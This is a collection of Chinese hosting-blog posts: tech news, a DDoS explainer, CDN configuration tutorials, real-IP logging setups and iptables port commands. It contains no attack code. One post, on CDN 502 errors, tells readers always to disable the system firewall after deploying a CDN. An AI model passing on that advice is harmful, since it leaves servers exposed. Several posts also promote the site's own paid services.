分析称,谷歌在中国的云合作伙伴关系将有助于该公司与亚马逊和微软展开竞争。与腾讯、浪潮等中国大型科技公司的合作会给谷歌带来强大的盟友,腾讯也需要拓展海外市场,获得新客户。 在技术上,谷歌和腾讯合作已久。2018年1月,谷歌和腾讯宣布了一项专利交叉许可协议,双方表示,专利协议将涵盖范围广泛的产品和技术,但未披露具体细节。腾讯官网显示,而且正在搭建一个包括思科、英伟达、德勤在内的合作伙伴生态系统。其云服务采用“Tencent Kubernetes”引擎,该技术与谷歌技术同名。腾讯在海外亦有使用谷歌云。 在谷歌云前CEO Diane Greene内的带领下,谷歌云平台将工程资源集中在人工智能和机器学习上,为其他公司提供支持谷歌搜索和其他服务的工具。11月,Diane Greene宣布将离开谷歌云,前甲骨文高管Thomas Kurian将在明年初接任。 Synergy Research的数据显示,2018年第三季度,亚马逊的AWS占据着34%的云基础设施服务市场;微软以15%的市场份额位居第二;随后两位分别是IBM(第三)和谷歌(第四),不过这两家的市场份额均为个位数。 不过,中国云服务市场仍然是本土公司占据主导地位,据研究公司IDC称,中国是全球第五大云计算服务市场,达到54亿美元。预计到2021年成为仅次于美国的第二大市场。 IDC最新发布的中国公有云服务市场半年度跟踪报告显示,2018上半年中国公有云服务整体市场规模(IaaS/PaaS/SaaS)超30亿美金,其中IaaS市场增速再创新高,同比增长83%。阿里云以43%的市场份额位居第一,随后是天翼云(11%)和腾讯云(8%)。 #### 传闻百度将推出独立视频剪辑产品“度咔剪辑” 4月26日 消息:如今短视频创作者数量大增,也带动了视频剪辑软件的火爆。在手机上视频剪辑的门槛已经大大降低,很多人都可以利用手机剪辑软件简单剪出一个效果不错的视频。 据钛媒体报道称,百度公司将于近日发布独立视频剪辑工具“度咔剪辑”,这款产品是首款面向泛知识创作者的视频剪辑工具,旨在针对性的解决泛知识创作者创作门槛高、内容生产力低下等痛点。 据悉这款视频剪辑软件目前在内测阶段,有可能在近期的百度万象大会上正式发布。 在手机上目前有几个比较热门的剪辑软甲,如必剪、剪映、iMovie等,这些软件的操作难度相对较低,成为了很多视频创作者常用的剪辑软件。随着短视频持续火爆,未来一段时间相信还有更多剪辑软件面向大众市场。 #### 伪造健康码,网页开发者被抓 1 月 13 日消息,据杭州市公安局西湖区分局官方消息,2022 年 1 月 12 日,公安机关在工作中发现一伪造杭州健康码网站。目前,网站已关停,网页开发者李某某(男,29 岁)已被公安机关控制,有关情况正在进一步调查中。 杭州市公安局西湖区分局表示,对于扰乱防疫秩序的违法行为,警方将依法查处,绝不姑息。 IT之家了解到,2021 年初,同样是杭州,一名 41 岁男子擅自研发“健康码演示”App 并上传至应用市场,扰乱社会秩序。该男子已被警方采取强制措施。 2021 年底,黑龙江省哈尔滨市、江苏省南通市都出现了伪造核酸阴性报告的情况,都已被警方查处。 #### 余额宝回来了:可随时转入,不限额度 自从余额宝今年限额买入之后就备受网友诟病,不但越来越难买了,而且收益还越来越低。而今天,支付宝向用户推送了余额宝服务升级邀请,收到邀请的用户选择升级就可以体验全新的余额宝。 从升级页面可以看到,升级后的余额宝就可以随时转入不受额度的限制,同时支持余额自动转入。只不过升级后的资产从天弘基金变成了国泰利是宝货币, 7 日年化收益率4.1%左右。 值得注意的是,目前余额宝升级服务并不是面向所有用户,只对受邀用户开放。不过相信不久将全面开放的。 #### 你不仁我不义,俄罗斯解封境内最大盗版资源网站RuTracker.org! 受到俄乌局势影响,微软、Adobe、Oracle 等软件商纷纷宣布不再支持俄区,不少游戏厂商、音乐和电影流媒体也终止了俄区服务。 “最近,从 Xbox、EA、CD Projekt 到动视暴雪、Epic 等主要游戏公司已经停止在俄罗斯和白俄罗斯的游戏销售。除此之外,谷歌、苹果、微软、甲骨文和 Meta 等软件开发商也宣布改变其在俄罗斯的业务计划。流媒体巨头 Netflix 暂停了所有来自俄罗斯的未来项目和收购。” 在这种态势发生后,俄罗斯当局取消了对盗版网站 RuTracker.org 的封锁,用户可以在其中下载破解的 Windows、Microsoft Office、AutoCAD 等版本,还有好莱坞电影、电视节目。 据悉,该资源网站最初在 torrents.ru 下运行,直到 2010 年他们切换到 rutracker.org 。2021 年 12 月 Similarweb 发布报告称, rutracker.org 曾为 4430 万用户提供服务。 有意思的是主机吧发现这个网站居然有乌克兰的节点…… #### 你敢相信?美国邮政山寨网站流量跟官网差不多 4 月 29 日消息,安全平台 Akamai 近日对美国邮政(United States Postal Service,USPS)官网进行调查,发现 2023 年 10 月到 2024 年 2 月间访问相关网站的用户中只有 51% 进入了正确的官网,剩下 49% 用户均访问了山寨钓鱼网站,而在特定的节日前后,相关网络钓鱼网站的 DNS 访问量据称大幅超过官网。 ▲ 山寨美国邮政网站 报告指出,山寨 USPS 官网通常使用一系列内嵌 USPS 的随机域名(例如 19810usps14514.com),黑客在架设好网站后,使用搜索引擎推广功能提升网站权重,让不知情的受害者点击进入,其中前四大山寨 USPS 钓鱼网站分别是 usps-post [.] world、uspspost [.] me、usps-postoffices [.] top 与 stamps-usps [.] online。 除了搜索引擎提升权重外,黑客还随机对外发送大量内含山寨网站的钓鱼短信 / 邮件,安全公司认为这也促使了相关山寨网站访问量能够与官网“五五开”。 #### 你的网站注意了!由于根证书故障 Let's Encrypt证书转换将在2021年发生问题 Let's Encrypt宣布,其服务使用的一个由IdenTrust提供的根证书将于2021年9月1日到期。Let's Encrypt用自己的名为ISRG Root X1的根证书为到期做好了准备,它在很多设备上都得到了支持,但存在一个问题:由于Android系统缓慢的更新形势,数百万运行Android7.1.1以下版本的设备将无法使用Let's Encrypt证书连接网站。 这不仅会影响用户在网页浏览器中导航到的网站,而且连接到网站拉取数据的应用程序也将无法连接。 为了帮助缓解这个问题,Let's Encrypt将提供一个备用证书链,兼容旧的根证书,这将是提供给网站管理员的临时解决方案,从长远来看,他们将能够显示一个横幅,要求旧的Android用户切换到Firefox Mobile(它的证书系统独立于Android),停止支持旧的Android版本,为旧设备降回HTTP,或切换到安装在旧设备上的证书授权(CA)。 [/content_hide]   #### 你的网站流量掉了吗?百度好看视频移动排名飙涨! 最近论坛上有很多站长反馈自己网站的流量掉得很厉害,查询后发现移动关键词排名基本都在前十开放外了。一开始以为是个别网站降权了,后来发现很多网站都这样。 于是就有站长爆料说,百度旗下的好看视频网站移动排名暴涨,怀疑是百度移动提高了旗下视频的权重,导致大家的移动关键词都跌了。 主机吧特地去查了下,发现确实是这样的,使用爱站工具查询后发我们发现从4号开始百度好看的移动排名暴涨。 爱站的移动权重直接封顶,就离谱! 而以传统图文代表的网站流量开始不同程度的下跌,比如csdn 再比如A5站长网 我们再来查询下移动搜索,真的没眼看了,前排一般都是百度广告,然后再到百度经验,再到百度爱采购,然后再到百度好看,然后再到百度百科,百度的一站易选,最后才给其它网站展示,作为一个搜索引擎简直离谱到家了,完全没有了公正信了。 我们可以看到百度移动给了百度好看非常详细的介绍,比如视频作者,视频发布时间,播放次数,简介等,这妥妥的C位了,咱们手机就这么大,一个视频介绍就给你占了三分之一,怎么玩? 未来想靠百度搜索引流更家难了,千万不要做跟百度旗下内容重复的事,否则排名绝对好不到哪去。 #### 你的网站被为什么会被DDoS攻击 如何防御DDoS 互联网安全威胁无处不在,随着网络安全问题的不断演化,DDoS攻击情况愈演愈烈,侵害了很多网站的利益,甚至威胁了很多网站的生存。 DDoS攻击日趋增强 据卡巴斯基2018 Q3全球DDoS攻击分析报告指出,在DDoS攻击方面,2018年第三季度相对平静。所谓“相对”,是因为主要资源上没有出现很多高级别或者连续多日的DDoS攻击。然而,犯罪分子攻击能力日趋增强,而攻击的总数却丝毫没有显示出下降的迹象。从攻击地理来说,中国仍然占据上限,其份额从59.03%飙升至77.67%。美国重新获得第二个位置,尽管它已经增长了0.11个百分点,达到12.57%。 (图片来源:卡巴斯基) 什么是DDoS攻击? DDoS攻击,又叫分布式拒绝服务攻击,指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力。 举个例子快速了解DDoS攻击: 一个店铺同一时间只能接待50个顾客,这时候竞争对手安排了50个人进来,他们进来以后占据着位置,赖着不走,并且提出一些乱七八糟的需求,让服务人员乱作一团,也让真正有需求的顾客无法进来,最终导致店铺损失惨重。 这就是 DDoS 攻击,它在短时间内发起大量请求,占据消耗服务器的资源,无法响应正常的访问,造成网站瘫痪。 为什么你的网站会被DDoS攻击? 正所谓无利不起早,没有无缘无故的DDoS攻击,毕竟DDoS攻击成本也是非常高的,只有收益大于成本,攻击行为才有意义。当收益足够大时,黑客就敢于冒更大的风险。 DDoS攻击-敲诈勒索 DDoS攻击者选取目标网站,事前发送勒索信息,索取“保护费”,不然将进行DDoS攻击,对其业务进行摧毁性打击。也有发动了DDoS攻击以后,然后再发送勒索信,如果受害者不按照要求支付,就会继续遭受攻击。 比如:韩国多家银行在2017年就遭到DDoS攻击威胁,著名的黑客组织“无敌舰队组织”向韩国7家银行进行勒索,要求7家银行以支付比特币的形式缴纳赎金,否则将发起DDoS攻击。“无敌舰队组织”向他们提出要求,最迟要在周一支付约30万美元的赎金,否则将正式发起DDoS攻击。 DDoS攻击-恶意竞争 DDoS攻击现在已不再只针对一些大型网站,一些初创型网站刚刚冒头,日均ip和流量正逐渐提高,很可能会遭遇一些不正当的竞争,对手雇佣黑客对你的网站进行DDoS攻击。尤其是在游戏、电商、金融行业,逐步占领市场也好,一家独大也好,在经历过几次DDoS攻击,出现无法登陆、掉线等情况,用户自然就会流失,网站也会日益衰败。 游戏行业成为DDoS重灾区! 随着游戏行业的大力发展,游戏行业的DDoS攻击的成本较低,游戏行业已经成为黑客眼中的肥肉。原因在于: 1. 游戏行业火爆,用户量大,同行竞争激烈; 2. 游戏行业对于用户体验要求高,需要不中断连续运转; 3. 游戏行业生命周期短,一旦被攻击可能导致用户大量流失; 4. 游戏行业的开发者资金更加充足。 根据卡巴斯基实验室客户数据显示DDoS攻击电子竞技运营商和网站的目的是拒绝访问,这种攻击正变得越来越普遍。 如何发现网站正被DDoS攻击? 网站流量访客异常增加,网络带宽资源占用率飙升接近饱和,网站服务器接收到大量无效请求,服务器CPU资源被大量占用,造成网站运行缓慢,连接打不开,甚至服务器直接宕机瘫痪。还有一种情况就是域名ping出不来IP,这种情况出现在攻击针对的目标为网站的DNS域名服务器。 DDoS都有哪些攻击方式? DDoS常见的攻击有SYN Flood攻击、ACK Flood攻击、UDP Flood攻击、DNS Flood攻击、CC攻击等。这些攻击方式可分为以下几种: 1、通过使网络过载来干扰甚至阻断正常的网络通讯; 2、通过向服务器提交大量请求,使服务器超负荷; 3、阻断某一用户访问服务器; 4、阻断某服务与特定系统或个人的通讯。 像SYN攻击从早期的利用TCP三次握手原理,伪造的IP源,以小博大,难以追踪,堪称经典的攻击类型。大量的伪造源的SYN攻击包进入服务器后,系统会产生大量的SYN_RECV状态,最后耗尽系统的SYN Backlog,导致服务器无法处理后续的TCP请求,导致服务器瘫痪。 DDoS攻击如何防御? 1、采用高性能的服务器,CPU处理能力更强; 2、开通更高的网络带宽,带宽决定抗攻击的能力; 3、把网站做成静态页面或者伪静态; 4、启用 SYN 攻击保护; 5、关闭不必要的服务,限制同时打开的Syn半连接数目; 6、开通Anti-DDoS流量清洗,DDoS高防服务; 7、安装专业防CC攻击的Web应用防火墙; 8、HTTP 恶意请求直接拦截; 9、备份网站,网站出了问题,正在全力抢修; 10、部署CDN,用户就近访问,提高速度。 #### 使用CDN后如何才不暴露IP 如今,越来越多的网站和服务开始使用CDN(内容分发网络)来加速内容分发,提高用户访问速度,同时增强网站的安全性。然而,在使用CDN时,我们需要注意保护源站IP不被泄露。本文将为大家介绍一些方法,帮助大家在使用CDN的同时,保护源站IP的安全。 一、使用CDN的白名单功能 CDN服务商通常会提供一个IP白名单功能,只有白名单中的IP才能访问源站。这样可以确保只有CDN节点能够访问源站,从而隐藏源站的IP。 二、修改源站的Hostname 通过修改源站的Hostname,可以防止攻击者通过Hostname找到源站IP。 三、防止证书信息泄露 在配置Web服务器时,要确保在返回空内容时不会同时返回证书信息。例如,在Nginx中,需要在配置文件中设置正确的返回规则,以防止在返回空内容时同时返回证书信息。 四、修改监听端口 如果可能,请修改Web服务器(如:Nginx等)监听的端口,以防止攻击者通过常规端口扫描找到源站IP。 五、设置默认返回规则 在Web服务器中,需要设置默认返回规则,以确保在请求未携带Hostname时,不会返回源站的信息。 六、通过伪造成其它真实存在的网站/CDN节点来混淆视听 这种方法可以欺骗非指向性扫描器,使其认为这台服务器上运行的是其他网站。 七、通过伪装成其它自制网站/返回空内容来屏蔽非法请求 这种方法需要结合CDN服务商提供的策略来完成,可以对非授权客户端返回一个假网站,例如:手工制作的假网站、设置反向代理等等。 八、客户端证书验证 作为一种非常见策略,客户端证书验证也可以用于防止源站IP的泄露。 总的来说,避免源站IP暴露需要从多个方面进行考虑和配置,以确保源站的安全。希望本文对大家有所帮助,让大家在使用CDN的同时,也能保护好源站IP的安全。 #### 使用CDN后腾讯云备案核查显示网站未解析腾讯云服务器 今天中午,主机邦收到了腾讯云备案电话,提醒主机邦旗下网站有两个问题,其中一个问题是主机邦旗下的yunjiasu.cc域名未直接解腾讯云的大陆服务器问题。 经查询,这个域名使用的百度云防护,所以显示的解析是百度IP,并不是腾讯云,按照规定核查到确实会显示异常。 不过,我们可以向腾讯云反馈核实确实使用了CDN,实际源IP还在腾讯云就可以了。 我们首先联系了官网右下角的客服中心-售后支持-备案核查人工客服 然后反馈给客服就行,比如主机邦这样: 确后我们提供下CDN设置的源IP截图给客服,等客服处理。 最后完成审核就可以了。 其实很简单,只要一般像阿里云、腾讯云这样的公司当网站备案有问题时,就会打电话提醒你修改,如果你的网站确实使用了CDN,只要反馈给备案专员审核就可以了,不用需要担心因为使用了CDN导致备案被注销。 最后,打个小广告,有需要高防CDN的可以联系主机邦,我们提供高性价比的高防CDN服务。 #### 使用CDN后获取用户真实IP详细教程 本章节介绍了不同类型的Web应用服务器(包括Tomcat、Apache、Nginx、IIS 6和IIS 7)如何获取客户端的真实IP。 背景信息 网站接入CDN加速后,源站服务器端从IP头部获取的用户访问IP不是客户端的真实IP。当您因为业务需要获取客户端真实IP时,可以通过配置网站服务器获取客户端的真实IP。 代理服务器(CDN、WAF等)在把用户的HTTP、WebSocket、WSS请求转到下一环节的服务器时,会在头部中加入一条“X-Forwarded-For”记录,用来记录用户的真实IP,其形式为“X-Forwarded-For:客户端的真实IP,代理服务器1-IP, 代理服务器2-IP,代理服务器3-IP,……”。 因此,您可以通过获取“X-Forwarded-For”对应的第一个IP来得到客户端的真实IP。 Nginx如何在访问日志中获取客户端真实IP 如果您的源站部署了Nginx反向代理,可通过在Nginx反向代理配置Location信息,后端Web服务器即可通过类似函数获取客户的真实IP地址。 根据源站Nginx反向代理的配置,在Nginx反向代理的相应location位置配置如下内容,获取客户IP的信息。 Location ^ / {proxy_pass ….;proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;} 后端Web服务器通过类似函数获取客户的真实IP。 request.getAttribute("X-Forwarded-For") Tomcat如何在访问日志中获取客户端真实IP 如果您的源站部署了Tomcat服务器,可通过启用Tomcat的X-Forwarded-For功能,获取客户端的真实IP地址。 打开“server.xml”文件(“tomcat/conf/server.xml”),AccessLogValve日志记录功能部分内容如下: <Host name="localhost" appBase="webapps" unpackWARs="true" autoDeploy="true"> <Valve className="org.apache.catalina.valves.AccessLogValve" directory="logs" prefix="localhost_access_log." suffix=".txt" pattern="%h %l %u %t "%r" %s %b"/> 在pattern中增加“%{X-Forwarded-For}i”,修改后的server.xml为: <Host name="localhost" appBase="webapps" unpackWARs="true" autoDeploy="true"> <Valve className="org.apache.catalina.valves.AccessLogValve" directory="logs" prefix="localhost_access_log." suffix=".txt" pattern="%{X-Forwarded-For}i %h %l %u %t "%r" %s %b" /> </Host> 查看“localhost_access_log”日志文件,可获取X-Forwarded-For对应的访问者真实IP。 Apache如何在访问日志中获取客户端真实IP 如果您的源站部署了Apache服务器,可通过运行命令安装Apache的第三方模块mod_rpaf,并修改“http.conf”文件获取客户IP地址。 执行以下命令安装Apache的一个第三方模块mod_rpaf。 wget https://github.com/gnif/mod_rpaf/archive/v0.6.0.tar.gz tar xvfz mod_rpaf-0.6.tar.gz cd mod_rpaf-0.6 /usr/local/apache/bin/apxs -i -c -n mod_rpaf-2.0.so mod_rpaf-2.0.c 打开“httpd.conf”配置文件,并将文件内容修改为如下内容: LoadModule rpaf_module modules/mod_rpaf-2.0.so ##加载mod_rpaf模块 <IfModule mod_rpaf.c> RPAFenable On RPAFsethostname On RPAFproxy_ips 127.0.0.1 <反向代理IPs> RPAFheader X-Forwarded-For </IfModule> 定义日志格式。 LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" common 启用自定义格式日志。 CustomLog "/[apache目录]/logs/$access.log" common 重启Apache,使配置生效。 /[apached目录]/httpd/bin/apachectl restart 查看“access.log”日志文件,可获取X-Forwarded-For对应的客户端真实IP。 IIS 6如何在访问日志中获取客户端真实IP 如果您的源站部署了IIS 6服务器,您可以通过安装“F5XForwardedFor.dll”插件,从IIS 6服务器记录的访问日志中获取客户端真实的IP地址。 下载F5XForwardedFor模块。根据您服务器的操作系统版本将“x86\Release”或者“x64\Release”目录中的“F5XForwardedFor.dll”文件拷贝至指定目录(例如,“C:\ISAPIFilters”),同时确保IIS进程对该目录有读取权限。打开IIS管理器,找到当前开启的网站,在该网站上右键选择“属性”,打开“属性”页面。在“属性”页面,切换至“ISAPI筛选器”,单击“添加”,在弹出的窗口中,配置如下信息:“筛选器名称”:“F5XForwardedFor”;“可执行文件”:“F5XForwardedFor.dll”的完整路径,例如:“C:\ISAPIFilters\F5XForwardedFor.dll”单击“确定”,重启IIS 6服务器。查看IIS 6服务器记录的访问日志(默认的日志路径为:“C:\WINDOWS\system32\LogFiles\ ”,IIS日志的文件名称以“.log”为后缀),可获取X-Forwarded-For对应的客户端真实IP。 IIS 7如何在访问日志中获取客户端真实IP 如果您的源站部署了IIS 7服务器,您可以通过安装“F5XForwardedFor”模块,从IIS 7服务器记录的访问日志中获取客户端真实的IP地址。 下载F5XForwardedFor模块。根据服务器的操作系统版本将“x86\Release”或者“x64\Release”目录中的“F5XFFHttpModule.dll”和“F5XFFHttpModule.ini”文件拷贝到指定目录(例如,“C:\x_forwarded_for\x86”或“C:\x_forwarded_for\x64”),并确保IIS进程对该目录有读取权限。在IIS服务器的选择项中,双击“模块”,进入“模块”界面。单击“配置本机模块”,在弹出的对话框中,单击“注册”。在弹出的对话框中,按操作系统注册已下载的DLL文件后,单击“确定”。x86操作系统:注册模块“x_forwarded_for_x86”名称:x_forwarded_for_x86路径:“C:\x_forwarded_for\x86\F5XFFHttpModule.dll”x64操作系统:注册模块“x_forwarded_for_x64”名称:x_forwarded_for_x64路径:“C:\x_forwarded_for\x64\F5XFFHttpModule.dll”注册完成后,勾选新注册的模块(“x_forwarded_for_x86”或“x_forwarded_for_x64”)并单击“确定”。在“ISAPI和CGI限制”中,按操作系统添加已注册的DLL文件,并将其“限制”改为“允许”。x86操作系统:ISAPI或CGI路径:“C:\x_forwarded_for\x86\F5XFFHttpModule.dll”描述:x86x64操作系统:ISAPI或CGI路径:“C:\x_forwarded_for\x64\F5XFFHttpModule.dll”描述:x64重启IIS 7服务器,等待配置生效。查看IIS 7服务器记录的访问日志(默认的日志路径为:“C:\WINDOWS\system32\LogFiles\ ”,IIS日志的文件名称以“.log”为后缀),可获取X-Forwarded-For对应的客户端真实IP。 #### 使用CDN后,网站访问一直502原因查询 最近,有位站长买了主机吧的CDN,反馈网站一直打不开,显示502状态 502 Bad Gateway The proxy server received an invalid response from an upstream server. Powered by Tengine 主机吧查询后,发现经过CDN的访问出现大量节点返回502状态,说明可能是服务器防火墙拦截了CDN的回源请求,导致大量超时。 由于客户使用的是宝塔控制面板,我们登陆宝塔面板查询发现,客户并没有安装宝塔的防火墙,但开启了系统防火墙。 我们把这个系统防火墙关掉后,就正常了,说明CentOS系统的默认的防火墙也是会拦截CDN的请求的,所以大家记得部署CDN后,一定要关掉系统防火墙。 #### 使用CDN如何让百度搜索引擎抓取源服务器IP 使用CDN的同学都知道CDN是可以隐藏请求IP的,给普通客户访问隐藏IP的同时也会影响搜索引擎抓取网站的IP。 一些同学怕搜索引擎抓取CDN IP节点影响网站收录及排名,所以就想有没有办法实现搜索引擎抓取源服务器IP,客户访问是CDN节点呢? 其实办法有两个: 1.利用域名解析回源 一般域名服务商的DNS都有搜索引擎专用的解析线路,比如阿里云   2.利用CDN搜索引擎回源功能 一般的普通的CDN加速服务都有搜索引擎回源功能,找到后,开启搜索引擎自动回源即可。当然也有一些CDN是不支持的搜索引擎回源功能的,比如百度云加速CDN就不支持搜索引擎回源,原因是一些黑客很容易模拟搜索引擎蜘蛛进行非法请求攻击,导致防御不了。如果你是用百度云加速的,那只能用第一种方法回源了。 #### 使用CloudFlare后提示网站“重定向的次数过多”解决办法 如果服务器设置了HTTP重定向到HTTPS,由于CloudFlare CDN默认SSL设置为“Flexible”模式(HTTP请求),这时服务器对于CloudFlare的响应会被加密,从而访问失败并不断重复发送相同请求。访问网站会提示“将您重定向的次数过多”或“ERR_TOO_MANY_REDIRECTS”错误,按提示清除浏览器Cookie也没用。 该问题的正常解决方法,只需调整CloudFlare后台Crypto页面里的SSL设置,改为 Full 或 Full (strict) 模式(前者不验证服务器证书,后者则会) CloudFlare CDN SSL设置 修改很快生效,一般几分钟时间。如果刷新页面还是有问题,清除浏览器缓存后再试。 #### 使用FinalShell工具SSH远程登陆linux服务器详细方法 linux服务器远程工具推荐,linux远程登录服务器的方法,如何使用FinalShell工具远程登录linux服务器,FinalShell免费下载登录linux服务器的步骤 前言:Linux系统远程SSH登录工具有很多,比如putty、xshell等,部分是免费使用,但部分是收费的,本文章将介绍有国人自己开发的一款非常不错的linux远程登录软件FinalShell,功能强大,界面美观,最重要的是还免费, FinalShell下载地址:https://www.hostbuf.com/t/988.html 若您喜欢用其他工具登录,可以试下putty工具: https://zhujib.com/linuxfuwuqisshdenglubibeigongjuputty.html 1、下载后双击安装,安装完毕后运行软件参考如图所示填写登录即可 注意:Linux系统默认的远程登录端口为22,但部分服务器提供商为了安全将该端口更改了,若22无法使用,请联系服务器提供商具体核实,比如西部数码的linux服务器默认端口为22000 2、点击确定后登录成功,如图, 文章来源:https://blog.tag.gg/showinfo-3-36024-0.html #### 使用交友软件的注意啦!和你聊天的可能是假的,趣住APP因涉嫌诈骗被警方查处 6月3日 消息:据看看新闻报道,6月3日,由邹某、陈某开发运营“趣住”APP因涉嫌诈骗被警方查处。 近日上海警方发现一款名为“趣住”的手机软件充斥大量暧昧图片文字,经侦查,警方成功捣毁了这个批量发布诱惑信息、骗取他人充值牟利的诈骗犯罪团伙,抓获犯罪嫌疑人10名。 犯罪嫌疑人交代,自2020年10月起,该团伙采用技术手段在软件后台批量创建了1万余个“虚拟女性”账号,从互联网络上获取大量女性图片制成头像,伪装成真实、活跃“女性”用户。 该团伙雇佣了专门的“代聊”人员在系统后台值守经营虚拟账号,同时,还诱导男性用户回访该“虚拟账号”并进行充值私聊,从而获利。 数据显示,自上线运营以来,该手机软件累计注册用户40余万,充值金额65万余元。 其实类似于这种虚假帐号很多交友软件都有,主机吧前几年玩陌陌的时候就遇到过,很多附近的美女帐号都是虚假的,陌陌的还算好的,而一些之前在抖音上推广的陌生人交友软件更是夸张,里面充斥着大量虚假帐号,你一登陆帐号他们就主动找你聊天,发语音,发视频,要电话等,而这些操作需要你给帐号充值相应的钱才可以开通的,很多刚接触社交软件的小白都会上当, #### 使用京东云星盾开启CF盾如何解决支付不回调问题 最近,有位客户反馈自己接入的京东云星盾后,开启了CF盾,网站的支付功能就无法回调。 其原因是开启CF盾后,网站会对每次请求都会有一个JS安全挑战,这会影响支付回调。 需要对请求的IP进行加白,或者对回调域名加白。 不过主机吧客户尝试把域名加白后,而且加了域名IP白名单,都没成功回调。 所以主机吧猜测,其支付回调的域名或者IP并不是客户添加的那个。 为了验证这个问题我们让客户尝试进行一次支付测试,然后我们进入京东云星盾控制台-数据分析-日志分析-安全事件 找到疑似支付的拦截事件,一般网站的支付路径都是pay的,我们把对应的请求IP 101.42.141.X、140.210.17.X 记录下来。 然后进入安全功能-防火墙规则-创建防火墙规则,把之前记录的两个IP设置加白。 加白后我再来测试支付是否成功,结果成功了,说明之前的那两个IP就是回调IP,完美解决回调问题,如有类似的问题,可以跟主机吧一样的操作,需要京东云星盾的同学也可以找我,价格优惠。 #### 使用宝塔如何隐藏PHP版本号 今天收到百度云计算那边的电话,具体内容是说我服务器使用的PHP7.2版本有漏洞,为了安全建议升级PHP7.3或者把PHP7.2的版本后隐藏起来,以免被不法份子利用。 而后主机吧直接把PHP7.2升级成了7.3,不过为了安全起见我们还是对PHP版本号进行了隐藏。如何隐藏呢? 不懂操作linux系统的,可以直接利用宝塔后台操作就好了。 1 进入宝塔后台,文件栏目 2 找到网站环境根目录,比如主机吧的是WWW,依次进入文件夹www-server-php,找到你网站使用的PHP版本,比如主机吧使用的是7.3 显示如下 3 进入73文件夹,找到/etc文件夹中的PHP.ini 4选好编辑,搜索expose_php,找到expose_php = On,我们直接把On改成Off,再重启下PHP配置即可完成隐藏PHP版本号   效果如下: expose_php = On expose_php = Off   #### 使用宝塔面板的CC攻击防护策略 宝塔面板是目前国内最常用的开源网站控制面板,其实宝塔面板不只是可以让你建站更简单,还能应对CC攻击。 下面讲下如何利用宝塔自带的功能来进行基本的CC防护。 首先我们必须安装启用nginx,然后进入nginx设置上有个WAF防火墙(有些版本叫过滤器),里面有CC防护设置。(要求nginx为1.12版本)如下图: 宝塔面板安全设置 上图中CC触发频率以及周期可以根据自己实际情况设置。 触发周期短检测时间就短,适用于供给比较大的情况,频率根据自己需求设置。 另外除了在这里之外,还可以在网站上进行流量限制。如下图: 宝塔linux面板网站流量限制 这里首先你要启用流量限制才可以。 具体参数解释 并发限制:一般一个日IP数万甚至十万的站,并发设置为一百多都可以。注意!这是并发,相当于你网站一秒钟有多少人同时进行请求。这个量很高了。 单IP限制:根据自己网站需求来设置。一般设置为5到10即可 流量限制:这个是限制单IP每个请求的流量大小。根据访客访问自己网站内容需要的流量大小来设置即可。   极端情况:如果宝塔面板根本打不开情况下使用。 面板打不开的情况下,使用SSH连接服务器,输入以下命令关闭服务器的80端口(关闭网站访问) 然后进入宝塔进行设置以上设置项。设置完毕后通过SSH再开启80端口。 命令如下: 关闭某端口 /sbin/iptables -I INPUT -p tcp –dport 端口号 -j DROP 保存修改 /etc/init.d/iptables save 重启防火墙 service iptables restart 开启某端口 /sbin/iptables -I INPUT -p tcp –dport 端口号 -j ACCEPT 查看端口状态 /etc/init.d/iptables status 举例:比如我关闭80端口就在SSH中输入以下命令 /sbin/iptables -I INPUT -p tcp –dport 80 -j DROP 然后保存设置 /etc/init.d/iptables save 然后重启防火墙生效 service iptables restart 后面再打开80端口 /sbin/iptables -I INPUT -p tcp –dport 80 -j ACCEPT 下面保存设置重启防火墙即可。 如果不会也可以直接重启网站服务器,再进行设置,CC攻击服务器刚重启是可以正常访问的。 如果效果不佳,推荐使用我们的安全防护CDN——百度云加速。百度云加速具备1Tbps的压制能力的抗D中心,拥有自有DDoS/CC清洗算法,可有效帮助网站防御SYN Flood、UDP Flood、ICMP Flood、TCP Flood、Connections Flood、Proxy Flood、CC等常见的洪水攻击。从而彻底解决了中小型网站在面对DDoS攻击时预算不足的尴尬,也为所有防护网站的稳定运行提供保障。 #### 使用宝塔面板直接管理CloudFlare DNS操作方法 CloudFlare 官方网站部分地方会出现经常访问不了的情况,所以使用宝塔面板直接管理DNS是一个非常好的解决方案,因为机房数据中心,一般稳定性比个人网络好。 今天主机帮教大家如何使用宝塔面板直接管理控制域名DNS。 一、安装DNS集中管理插件 1.进入宝塔面板-软件商店 2.搜索DNS集中管理,并安装 3.安装成功后点设置 4.管理DNS帐号 5.添加DNS验证 6.选择CloudFlare,并输入CloudFlare的登陆邮箱和api KEY。(api KEY看下面第二步申请) 7.添加域名解析 二、申请CloudFlare api KEY 1、登录到CloudFlare后台https://dash.cloudflare.com/login 2、找到右上角的个人资料 3、找到API令牌这里,我们可以选择使用全局秘钥,或者单独创建一个DNS管理的密钥图方便可以用全局秘钥(看第五步),为了安全可以创建DNS管理密钥(看第四步) 4、API令牌获取方式(两步)  4.1、创建DNSAPI令牌   4.2、复制令牌 5、API秘钥方式   5.1、查看API令牌    5.2、输入密码查看并复制 #### 使用百度云加速CC攻击超量了怎么办? 最近有位站长使用百度云加速进行防御后,发现攻击量超过了防御套餐的防御量了,显示防御量超10G万每秒,这是百度云加速套餐的最高防御量了,所以一般百度云加速都会把超量的直接停了。 那么如果超了怎么办呢? 目前百度云加速提供高防版的购买,高防版有高防包,可以临时开启后,拥有超强防御能力。 高防包优惠购买地址:https://zhujib.com/shop/21306.html 不过主机吧推荐使用京东云星盾套餐,京东云星盾安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 京东云星盾拥有远超百度云加速的CC防护能力,只需要购买商业版就可以拥有很强的拦截能力了,有需要的同学可以试试。 京东云星盾优惠购买地址:https://zhujib.com/shop/20576.html #### 使用百度云加速CDN后微信网页授权登录提示Error code: 40164, message: invalid ip 最近有位站长向主机吧反馈,网站在接入百度云加速后,微信网页授权登录的时候,提示Error code: 40164, message: invalid ip错误。 主机吧查了下,这跟CDN是无关的,原因是源服务器IP更换后,并没有在微信公众平台加白所致。 